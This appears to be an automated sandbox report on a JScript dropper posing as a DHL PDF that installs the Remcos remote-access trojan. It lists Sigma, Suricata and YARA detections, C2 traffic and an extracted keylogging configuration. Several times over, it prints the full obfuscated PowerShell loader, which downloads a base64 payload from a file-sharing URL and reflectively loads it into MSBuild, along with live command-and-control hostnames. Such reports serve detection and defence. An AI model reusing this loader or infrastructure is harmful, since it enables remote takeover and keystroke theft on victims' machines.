$KznfbhLAKWeixbiKOLmf.IndexOf($fkbtKicqWUKucKZfPsGZ);$IWkjipLrkKzmLLZTWnAZ -ge 0 -and $kLqhkkloLQnlpAAWtUfc -gt $IWkjipLrkKzmLLZTWnAZ;$IWkjipLrkKzmLLZTWnAZ += $pqGmGJhCUdHPTWoNGzoi.Length;$WZWCixKGqLjWLKAblnWb = $kLqhkkloLQnlpAAWtUfc - $IWkjipLrkKzmLLZTWnAZ;$BqfbkPmiGKPWmKNxlCCR = $KznfbhLAKWeixbiKOLmf.Substring($IWkjipLrkKzmLLZTWnAZ, $WZWCixKGqLjWLKAblnWb);$izpdcONcauWPfczuWZNS = [System.Convert]::FromBase64String($BqfbkPmiGKPWmKNxlCCR);$GtULNOKhlcioutbuALkp = [System.Reflection.Assembly]::Load($izpdcONcauWPfczuWZNS);$aPozWGuWPfkczdpKSqdK = [dnlib.IO.Home].GetMethod('VAI').Invoke($null, [object[]] @($khuGfWKcLCfBKPjrGWTo,'','','','MSBuild','','','','','C:\ProgramData\','marly','js','1','1','pessaries'))", 
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 6968, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /C copy *.js "C:\ProgramData\marly.js", ProcessId: 1772, ProcessName: cmd.exe
          Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "$UUcRpCLGmLLdZKLGLZCh = '#x#.mon/ssc/sr.marolka#s//:sp##h';$khuGfWKcLCfBKPjrGWTo = $UUcRpCLGmLLdZKLGLZCh -replace '#', 't';$BokSBmcmWWtzWevWaoqx = 'https://3005.filemail.com/api/file/get?filekey=nIx_5T0LxHOBjilNb9CRviabPjrW2dlC-LxeOdJPF_Z_1MP6CuQBS5KcptA&pk_vid=342803d1cc4e3b801739359203b5fe9d';$qkoqGLWpWlePGLTbGWKi = New-Object System.Net.WebClient;$UtrGGLzeWZaiUKLALckK = $qkoqGLWpWlePGLTbGWKi.DownloadData($BokSBmcmWWtzWevWaoqx);$KznfbhLAKWeixbiKOLmf = [System.Text.Encoding]::UTF8.GetString($UtrGGLzeWZaiUKLALckK);$pqGmGJhCUdHPTWoNGzoi = '<<BASE64_START>>';$fkbtKicqWUKucKZfPsGZ = '<<BASE64_END>>';$IWkjipLrkKzmLLZTWnAZ = $KznfbhLAKWeixbiKOLmf.IndexOf($pqGmGJhCUdHPTWoNGzoi);$kLqhkkloLQnlpAAWtUfc = $KznfbhLAKWeixbiKOLmf.IndexOf($fkbtKicqWUKucKZfPsGZ);$IWkjipLrkKzmLLZTWnAZ -ge 0 -and $kLqhkkloLQnlpAAWtUfc -gt $IWkjipLrkKzmLLZTWnAZ;$IWkjipLrkKzmLLZTWnAZ += $pqGmGJhCUdHPTWoNGzoi.Length;$WZWCixKGqLjWLKAblnWb = $kLqhkkloLQnlpAAWtUfc - $IWkjipLrkKzmLLZTWnAZ;$BqfbkPmiGKPWmKNxlCCR = $KznfbhLAKWeixbiKOLmf.Substring($IWkjipLrkKzmLLZTWnAZ, $WZWCixKGqLjWLKAblnWb);$izpdcONcauWPfczuWZNS = [System.Convert]::FromBase64String($BqfbkPmiGKPWmKNxlCCR);$GtULNOKhlcioutbuALkp = [System.Reflection.Assembly]::Load($izpdcONcauWPfczuWZNS);$aPozWGuWPfkczdpKSqdK = [dnlib.IO.Home].GetMethod('VAI').Invoke($null, [object[]] @($khuGfWKcLCfBKPjrGWTo,'','','','MSBuild','','','','','C:\ProgramData\','marly','js','1','1','pessaries'))", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "$UUcRpCLGmLLdZKLGLZCh = '#x#.mon/ssc/sr.marolka#s//:sp##h';$khuGfWKcLCfBKPjrGWTo = $UUcRpCLGmLLdZKLGLZCh -replace '#', 't';$BokSBmcmWWtzWevWaoqx = 
'https://3005.filemail.com/api/file/get?filekey=nIx_5T0LxHOBjilNb9CRviabPjrW2dlC-LxeOdJPF_Z_1MP6CuQBS5KcptA&pk_vid=342803d1cc4e3b801739359203b5fe9d';$qkoqGLWpWlePGLTbGWKi = New-Object System.Net.WebClient;$UtrGGLzeWZaiUKLALckK = $qkoqGLWpWlePGLTbGWKi.DownloadData($BokSBmcmWWtzWevWaoqx);$KznfbhLAKWeixbiKOLmf = [System.Text.Encoding]::UTF8.GetString($UtrGGLzeWZaiUKLALckK);$pqGmGJhCUdHPTWoNGzoi = '<<BASE64_START>>';$fkbtKicqWUKucKZfPsGZ = '<<BASE64_END>>';$IWkjipLrkKzmLLZTWnAZ = $KznfbhLAKWeixbiKOLmf.IndexOf($pqGmGJhCUdHPTWoNGzoi);$kLqhkkloLQnlpAAWtUfc = $KznfbhLAKWeixbiKOLmf.IndexOf($fkbtKicqWUKucKZfPsGZ);$IWkjipLrkKzmLLZTWnAZ -ge 0 -and $kLqhkkloLQnlpAAWtUfc -gt $IWkjipLrkKzmLLZTWnAZ;$IWkjipLrkKzmLLZTWnAZ += $pqGmGJhCUdHPTWoNGzoi.Length;$WZWCixKGqLjWLKAblnWb = $kLqhkkloLQnlpAAWtUfc - $IWkjipLrkKzmLLZTWnAZ;$BqfbkPmiGKPWmKNxlCCR = $KznfbhLAKWeixbiKOLmf.Substring($IWkjipLrkKzmLLZTWnAZ, $WZWCixKGqLjWLKAblnWb);$izpdcONcauWPfczuWZNS = [System.Convert]::FromBase64String($BqfbkPmiGKPWmKNxlCCR);$GtULNOKhlcioutbuALkp = [System.Reflection.Assembly]::Load($izpdcONcauWPfczuWZNS);$aPozWGuWPfkczdpKSqdK = [dnlib.IO.Home].GetMethod('VAI').Invoke($null, [object[]] @($khuGfWKcLCfBKPjrGWTo,'','','','MSBuild','','','','','C:\ProgramData\','marly','js','1','1','pessa
Source: Process started; Author: Michael Haag; Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\DHL RPA GRBP Template.PDF.js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\DHL RPA GRBP Template.PDF.js", CommandLine|base64offset|contains: D, Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\DHL RPA GRBP Template.PDF.js", ProcessId: 1492, ProcessName: wscript.exe
          Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "$UUcRpCLGmLLdZKLGLZCh = '#x#.mon/ssc/sr.marolka#s//:sp##h';$khuGfWKcLCfBKPjrGWTo = $UUcRpCLGmLLdZKLGLZCh -replace '#', 't';$BokSBmcmWWtzWevWaoqx = 'https://3005.filemail.com/api/file/get?filekey=nIx_5T0LxHOBjilNb9CRviabPjrW2dlC-LxeOdJPF_Z_1MP6CuQBS5KcptA&pk_vid=342803d1cc4e3b801739359203b5fe9d';$qkoqGLWpWlePGLTbGWKi = New-Object System.Net.WebClient;$UtrGGLzeWZaiUKLALckK = $qkoqGLWpWlePGLTbGWKi.DownloadData($BokSBmcmWWtzWevWaoqx);$KznfbhLAKWeixbiKOLmf = [System.Text.Encoding]::UTF8.GetString($UtrGGLzeWZaiUKLALckK);$pqGmGJhCUdHPTWoNGzoi = '<<BASE64_START>>';$fkbtKicqWUKucKZfPsGZ = '<<BASE64_END>>';$IWkjipLrkKzmLLZTWnAZ = $KznfbhLAKWeixbiKOLmf.IndexOf($pqGmGJhCUdHPTWoNGzoi);$kLqhkkloLQnlpAAWtUfc = $KznfbhLAKWeixbiKOLmf.IndexOf($fkbtKicqWUKucKZfPsGZ);$IWkjipLrkKzmLLZTWnAZ -ge 0 -and $kLqhkkloLQnlpAAWtUfc -gt $IWkjipLrkKzmLLZTWnAZ;$IWkjipLrkKzmLLZTWnAZ += $pqGmGJhCUdHPTWoNGzoi.Length;$WZWCixKGqLjWLKAblnWb = $kLqhkkloLQnlpAAWtUfc - $IWkjipLrkKzmLLZTWnAZ;$BqfbkPmiGKPWmKNxlCCR = $KznfbhLAKWeixbiKOLmf.Substring($IWkjipLrkKzmLLZTWnAZ, $WZWCixKGqLjWLKAblnWb);$izpdcONcauWPfczuWZNS = [System.Convert]::FromBase64String($BqfbkPmiGKPWmKNxlCCR);$GtULNOKhlcioutbuALkp = [System.Reflection.Assembly]::Load($izpdcONcauWPfczuWZNS);$aPozWGuWPfkczdpKSqdK = [dnlib.IO.Home].GetMethod('VAI').Invoke($null, [object[]] @($khuGfWKcLCfBKPjrGWTo,'','','','MSBuild','','','','','C:\ProgramData\','marly','js','1','1','pessaries'))", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "$UUcRpCLGmLLdZKLGLZCh = '#x#.mon/ssc/sr.marolka#s//:sp##h';$khuGfWKcLCfBKPjrGWTo = $UUcRpCLGmLLdZKLGLZCh -replace '#', 't';$BokSBmcmWWtzWevWaoqx = 
'https://3005.filemail.com/api/file/get?filekey=nIx_5T0LxHOBjilNb9CRviabPjrW2dlC-LxeOdJPF_Z_1MP6CuQBS5KcptA&pk_vid=342803d1cc4e3b801739359203b5fe9d';$qkoqGLWpWlePGLTbGWKi = New-Object System.Net.WebClient;$UtrGGLzeWZaiUKLALckK = $qkoqGLWpWlePGLTbGWKi.DownloadData($BokSBmcmWWtzWevWaoqx);$KznfbhLAKWeixbiKOLmf = [System.Text.Encoding]::UTF8.GetString($UtrGGLzeWZaiUKLALckK);$pqGmGJhCUdHPTWoNGzoi = '<<BASE64_START>>';$fkbtKicqWUKucKZfPsGZ = '<<BASE64_END>>';$IWkjipLrkKzmLLZTWnAZ = $KznfbhLAKWeixbiKOLmf.IndexOf($pqGmGJhCUdHPTWoNGzoi);$kLqhkkloLQnlpAAWtUfc = $KznfbhLAKWeixbiKOLmf.IndexOf($fkbtKicqWUKucKZfPsGZ);$IWkjipLrkKzmLLZTWnAZ -ge 0 -and $kLqhkkloLQnlpAAWtUfc -gt $IWkjipLrkKzmLLZTWnAZ;$IWkjipLrkKzmLLZTWnAZ += $pqGmGJhCUdHPTWoNGzoi.Length;$WZWCixKGqLjWLKAblnWb = $kLqhkkloLQnlpAAWtUfc - $IWkjipLrkKzmLLZTWnAZ;$BqfbkPmiGKPWmKNxlCCR = $KznfbhLAKWeixbiKOLmf.Substring($IWkjipLrkKzmLLZTWnAZ, $WZWCixKGqLjWLKAblnWb);$izpdcONcauWPfczuWZNS = [System.Convert]::FromBase64String($BqfbkPmiGKPWmKNxlCCR);$GtULNOKhlcioutbuALkp = [System.Reflection.Assembly]::Load($izpdcONcauWPfczuWZNS);$aPozWGuWPfkczdpKSqdK = [dnlib.IO.Home].GetMethod('VAI').Invoke($null, [object[]] @($khuGfWKcLCfBKPjrGWTo,'','','','MSBuild','','','','','C:\ProgramData\','marly','js','1','1','pessa

          Data Obfuscation

          Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "$UUcRpCLGmLLdZKLGLZCh = '#x#.mon/ssc/sr.marolka#s//:sp##h';$khuGfWKcLCfBKPjrGWTo = $UUcRpCLGmLLdZKLGLZCh -replace '#', 't';$BokSBmcmWWtzWevWaoqx = 'https://3005.filemail.com/api/file/get?filekey=nIx_5T0LxHOBjilNb9CRviabPjrW2dlC-LxeOdJPF_Z_1MP6CuQBS5KcptA&pk_vid=342803d1cc4e3b801739359203b5fe9d';$qkoqGLWpWlePGLTbGWKi = New-Object System.Net.WebClient;$UtrGGLzeWZaiUKLALckK = $qkoqGLWpWlePGLTbGWKi.DownloadData($BokSBmcmWWtzWevWaoqx);$KznfbhLAKWeixbiKOLmf = [System.Text.Encoding]::UTF8.GetString($UtrGGLzeWZaiUKLALckK);$pqGmGJhCUdHPTWoNGzoi = '<<BASE64_START>>';$fkbtKicqWUKucKZfPsGZ = '<<BASE64_END>>';$IWkjipLrkKzmLLZTWnAZ = $KznfbhLAKWeixbiKOLmf.IndexOf($pqGmGJhCUdHPTWoNGzoi);$kLqhkkloLQnlpAAWtUfc = $KznfbhLAKWeixbiKOLmf.IndexOf($fkbtKicqWUKucKZfPsGZ);$IWkjipLrkKzmLLZTWnAZ -ge 0 -and $kLqhkkloLQnlpAAWtUfc -gt $IWkjipLrkKzmLLZTWnAZ;$IWkjipLrkKzmLLZTWnAZ += $pqGmGJhCUdHPTWoNGzoi.Length;$WZWCixKGqLjWLKAblnWb = $kLqhkkloLQnlpAAWtUfc - $IWkjipLrkKzmLLZTWnAZ;$BqfbkPmiGKPWmKNxlCCR = $KznfbhLAKWeixbiKOLmf.Substring($IWkjipLrkKzmLLZTWnAZ, $WZWCixKGqLjWLKAblnWb);$izpdcONcauWPfczuWZNS = [System.Convert]::FromBase64String($BqfbkPmiGKPWmKNxlCCR);$GtULNOKhlcioutbuALkp = [System.Reflection.Assembly]::Load($izpdcONcauWPfczuWZNS);$aPozWGuWPfkczdpKSqdK = [dnlib.IO.Home].GetMethod('VAI').Invoke($null, [object[]] @($khuGfWKcLCfBKPjrGWTo,'','','','MSBuild','','','','','C:\ProgramData\','marly','js','1','1','pessaries'))", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "$UUcRpCLGmLLdZKLGLZCh = '#x#.mon/ssc/sr.marolka#s//:sp##h';$khuGfWKcLCfBKPjrGWTo = $UUcRpCLGmLLdZKLGLZCh -replace '#', 't';$BokSBmcmWWtzWevWaoqx = 'https://3005.filemail.com/api/file/get?filekey=nIx_5T0LxHOBjilNb9CRviabPjrW2dlC-LxeOdJPF_Z_1MP6CuQBS5KcptA&pk_vid=342803d1cc4e3b801739359203b5fe9d';$qkoqGLWpWlePGLTbGWKi = New-Object 
System.Net.WebClient;$UtrGGLzeWZaiUKLALckK = $qkoqGLWpWlePGLTbGWKi.DownloadData($BokSBmcmWWtzWevWaoqx);$KznfbhLAKWeixbiKOLmf = [System.Text.Encoding]::UTF8.GetString($UtrGGLzeWZaiUKLALckK);$pqGmGJhCUdHPTWoNGzoi = '<<BASE64_START>>';$fkbtKicqWUKucKZfPsGZ = '<<BASE64_END>>';$IWkjipLrkKzmLLZTWnAZ = $KznfbhLAKWeixbiKOLmf.IndexOf($pqGmGJhCUdHPTWoNGzoi);$kLqhkkloLQnlpAAWtUfc = $KznfbhLAKWeixbiKOLmf.IndexOf($fkbtKicqWUKucKZfPsGZ);$IWkjipLrkKzmLLZTWnAZ -ge 0 -and $kLqhkkloLQnlpAAWtUfc -gt $IWkjipLrkKzmLLZTWnAZ;$IWkjipLrkKzmLLZTWnAZ += $pqGmGJhCUdHPTWoNGzoi.Length;$WZWCixKGqLjWLKAblnWb = $kLqhkkloLQnlpAAWtUfc - $IWkjipLrkKzmLLZTWnAZ;$BqfbkPmiGKPWmKNxlCCR = $KznfbhLAKWeixbiKOLmf.Substring($IWkjipLrkKzmLLZTWnAZ, $WZWCixKGqLjWLKAblnWb);$izpdcONcauWPfczuWZNS = [System.Convert]::FromBase64String($BqfbkPmiGKPWmKNxlCCR);$GtULNOKhlcioutbuALkp = [System.Reflection.Assembly]::Load($izpdcONcauWPfczuWZNS);$aPozWGuWPfkczdpKSqdK = [dnlib.IO.Home].GetMethod('VAI').Invoke($null, [object[]] @($khuGfWKcLCfBKPjrGWTo,'','','','MSBuild','','','','','C:\ProgramData\','marly','js','1','1','pessa
          Timestamp                        SID      Severity  Classtype                                      Source IP        Source Port  Destination IP   Destination Port  Protocol
          2025-02-19T16:11:51.646997+0100  2020423  1         Exploit Kit Activity Detected                  37.27.124.176    443          192.168.2.5      49837             TCP
          2025-02-19T16:11:51.646997+0100  2020425  1         Exploit Kit Activity Detected                  37.27.124.176    443          192.168.2.5      49837             TCP
          2025-02-19T16:11:53.122959+0100  2036594  1         Malware Command and Control Activity Detected  192.168.2.5      49850        109.248.150.195  3174              TCP
          2025-02-19T16:11:52.128950+0100  2057635  1         A Network Trojan was detected                  37.27.124.176    443          192.168.2.5      49837             TCP
          2025-02-19T16:11:49.138300+0100  2049038  1         A Network Trojan was detected                  193.30.119.105   443          192.168.2.5      49802             TCP
          2025-02-19T16:11:54.457658+0100  2803304  3         Unknown Traffic                                192.168.2.5      49861        178.237.33.50    80                TCP
          2025-02-19T16:11:52.128950+0100  2858295  1         A Network Trojan was detected                  37.27.124.176    443          192.168.2.5      49837             TCP

          AV Detection

          Source: meme.linkpc.net | Avira URL Cloud: Label: malware
          Source: 00000002.00000002.2452741154.0000016F102FB000.00000004.00000800.00020000.00000000.sdmp | Malware Configuration Extractor: Remcos {"Host:Port:Password": ["meme.linkpc.net:3174:1"], "Assigned name": "nm", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "sos", "Hide file": "Disable", "Mutex": "gig-G7MMFK", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Enable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "vlc", "Keylog folder": "ios", "Keylog file max size": "100"}
          Source: DHL RPA GRBP Template.PDF.js | ReversingLabs: Detection: 37%
          Source: DHL RPA GRBP Template.PDF.js | Virustotal: Detection: 37%
          Source: Yara match | File source: 2.2.powershell.exe.16f1056dd48.5.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 8.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 8.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 2.2.powershell.exe.16f1056dd48.5.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 2.2.powershell.exe.16f115cf6e8.6.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 00000008.00000002.3527390495.0000000001208000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000008.00000002.3525134792.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000002.00000002.2452741154.0000016F102FB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000002.00000002.2452741154.0000016F1101B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: Process Memory Space: powershell.exe PID: 6968, type: MEMORYSTR
          Source: Yara match | File source: Process Memory Space: MSBuild.exe PID: 5600, type: MEMORYSTR
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 8_2_004315EC CryptAcquireContextA,CryptGenRandom,CryptReleaseContext | 8_2_004315EC
          Source: powershell.exe, 00000002.00000002.2452741154.0000016F102FB000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: -----BEGIN PUBLIC KEY-----memstr_1c6d0686-9
          Source: unknown | HTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.5:49717 version: TLS 1.2
          Source: unknown | HTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.5:49718 version: TLS 1.2
          Source: unknown | HTTPS traffic detected: 23.186.113.60:443 -> 192.168.2.5:49762 version: TLS 1.2
          Source: unknown | HTTPS traffic detected: 193.30.119.105:443 -> 192.168.2.5:49802 version: TLS 1.2
          Source: unknown | HTTPS traffic detected: 37.27.124.176:443 -> 192.168.2.5:49837 version: TLS 1.2
          Source: Binary string: dnlib.DotNet.Pdb.PdbWriter+ | source: powershell.exe, 00000002.00000002.2452741154.0000016F1101B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2502322189.0000016F7E3F0000.00000004.08000000.00040000.00000000.sdmp
          Source: Binary string: dnlib.DotNet.Pdb.Managed | source: powershell.exe, 00000002.00000002.2452741154.0000016F1101B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2502322189.0000016F7E3F0000.00000004.08000000.00040000.00000000.sdmp
          Source: Binary string: dnlib.dotnet.pdb | source: powershell.exe, 00000002.00000002.2510865192.00007FF8488CC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2512100355.00007FF848950000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: dnlib.DotNet.Pdb.Dss | source: powershell.exe, 00000002.00000002.2452741154.0000016F1101B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2502322189.0000016F7E3F0000.00000004.08000000.00040000.00000000.sdmp
          Source: Binary string: System.Collections.Generic.IEnumerable<dnlib.DotNet.Pdb.PdbScope>.GetEnumerator | source: powershell.exe, 00000002.00000002.2452741154.0000016F1101B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2502322189.0000016F7E3F0000.00000004.08000000.00040000.00000000.sdmp
          Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.Current | source: powershell.exe, 00000002.00000002.2452741154.0000016F1101B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2502322189.0000016F7E3F0000.00000004.08000000.00040000.00000000.sdmp
          Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.get_Current | source: powershell.exe, 00000002.00000002.2452741154.0000016F1101B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2502322189.0000016F7E3F0000.00000004.08000000.00040000.00000000.sdmp
          Source: Binary string: dnlib.dotnet.pdb.dss | source: powershell.exe, 00000002.00000002.2510865192.00007FF8488CC000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: dnlib.dotnet.pdbsymbolwritercreator | source: powershell.exe, 00000002.00000002.2512100355.00007FF848950000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: dnlib.dotnet.pdb.managed | source: powershell.exe, 00000002.00000002.2510865192.00007FF8488CC000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: dnlib.DotNet.Pdb | source: powershell.exe, 00000002.00000002.2452741154.0000016F1101B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2502322189.0000016F7E3F0000.00000004.08000000.00040000.00000000.sdmp
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 8_2_0041A01B FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose | 8_2_0041A01B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 8_2_0040B28E FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose | 8_2_0040B28E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 8_2_0040838E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose | 8_2_0040838E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 8_2_004087A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose | 8_2_004087A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 8_2_00407848 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose | 8_2_00407848
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 8_2_004068CD FindFirstFileW,FindNextFileW | 8_2_004068CD
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 8_2_0044BA59 FindFirstFileExA | 8_2_0044BA59
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 8_2_0040AA71 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose | 8_2_0040AA71
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 8_2_00417AAB FindFirstFileW,FindNextFileW,FindNextFileW | 8_2_00417AAB
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 8_2_0040AC78 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose | 8_2_0040AC78
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 8_2_00406D28 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW | 8_2_00406D28

          Software Vulnerabilities

          Source: C:\Windows\System32\wscript.exe | Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

          Networking

          Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:49850 -> 109.248.150.195:3174
          Source: Network traffic | Suricata IDS: 2049038 - Severity 1 - ET MALWARE ReverseLoader Reverse Base64 Loader In Image M2 : 193.30.119.105:443 -> 192.168.2.5:49802
          Source: Network traffic | Suricata IDS: 2020423 - Severity 1 - ET EXPLOIT_KIT ReverseLoader Base64 Payload Inbound : 37.27.124.176:443 -> 192.168.2.5:49837
          Source: Network traffic | Suricata IDS: 2020425 - Severity 1 - ET EXPLOIT_KIT ReverseLoader Base64 Payload Inbound M2 : 37.27.124.176:443 -> 192.168.2.5:49837
          Source: Network traffic | Suricata IDS: 2057635 - Severity 1 - ET MALWARE Reverse Base64 Encoded MZ Header Payload Inbound : 37.27.124.176:443 -> 192.168.2.5:49837
          Source: Network traffic | Suricata IDS: 2858295 - Severity 1 - ETPRO MALWARE ReverseLoader Base64 Encoded EXE With Content-Type Mismatch (text/plain) : 37.27.124.176:443 -> 192.168.2.5:49837
          Source: C:\Windows\System32\wscript.exe | Network Connect: 23.186.113.60 443
          Source: Malware configuration extractor | URLs: meme.linkpc.net
          Source: unknown | DNS query: name: paste.ee
          Source: global traffic | TCP traffic: 192.168.2.5:49850 -> 109.248.150.195:3174
          Source: global traffic | HTTP traffic detected: GET /api/file/get?filekey=nIx_5T0LxHOBjilNb9CRviabPjrW2dlC-LxeOdJPF_Z_1MP6CuQBS5KcptA&pk_vid=342803d1cc4e3b801739359203b5fe9d HTTP/1.1 Host: 3005.filemail.com Connection: Keep-Alive
          Source: global traffic | HTTP traffic detected: GET /css/nom.txt HTTP/1.1 Host: stakloram.rs Connection: Keep-Alive
          Source: global traffic | HTTP traffic detected: GET /json.gp HTTP/1.1 Host: geoplugin.net Cache-Control: no-cache
          Source: Joe Sandbox View | IP Address: 23.186.113.60
          Source: Joe Sandbox View | IP Address: 193.30.119.105
          Source: Joe Sandbox View | IP Address: 178.237.33.50
          Source: Joe Sandbox View | ASN Name: DATACLUBLV
          Source: Joe Sandbox View | ASN Name: UNINETAZ
          Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
          Source: Joe Sandbox View | JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
          Source: Network traffic | Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.5:49861 -> 178.237.33.50:80
          Source: global traffic | HTTP traffic detected: GET /d/FsssIAil HTTP/1.1 Accept: */* Accept-Language: en-ch UA-CPU: AMD64 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: paste.ee Connection: Keep-Alive
          Source: unknown | TCP traffic detected without corresponding DNS query: 40.115.3.253
          Source: unknown | TCP traffic detected without corresponding DNS query: 23.1.237.91
          Source: unknown | TCP traffic detected without corresponding DNS query: 217.20.57.36
          Source: unknown | TCP traffic detected without corresponding DNS query: 20.190.160.17
          Source: unknown | TCP traffic detected without corresponding DNS query: 40.126.32.140
          Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 8_2_0041936B InternetOpenW,InternetOpenUrlW,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle | 8_2_0041936B
          Source: global trafficDNS traffic detected: DNS query: paste.ee
          Source: global trafficDNS traffic detected: DNS query: 3005.filemail.com
          Source: global trafficDNS traffic detected: DNS query: stakloram.rs
          Source: global trafficDNS traffic detected: DNS query: meme.linkpc.net
          Source: global trafficDNS traffic detected: DNS query: geoplugin.net
          Source: MSBuild.exe, MSBuild.exe, 00000008.00000002.3527390495.0000000001208000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000008.00000002.3527819349.0000000001255000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000008.00000002.3527819349.0000000001266000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://geoplugin.net/json.gp
          Source: MSBuild.exe, 00000008.00000002.3527819349.0000000001255000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://geoplugin.net/json.gp$Y
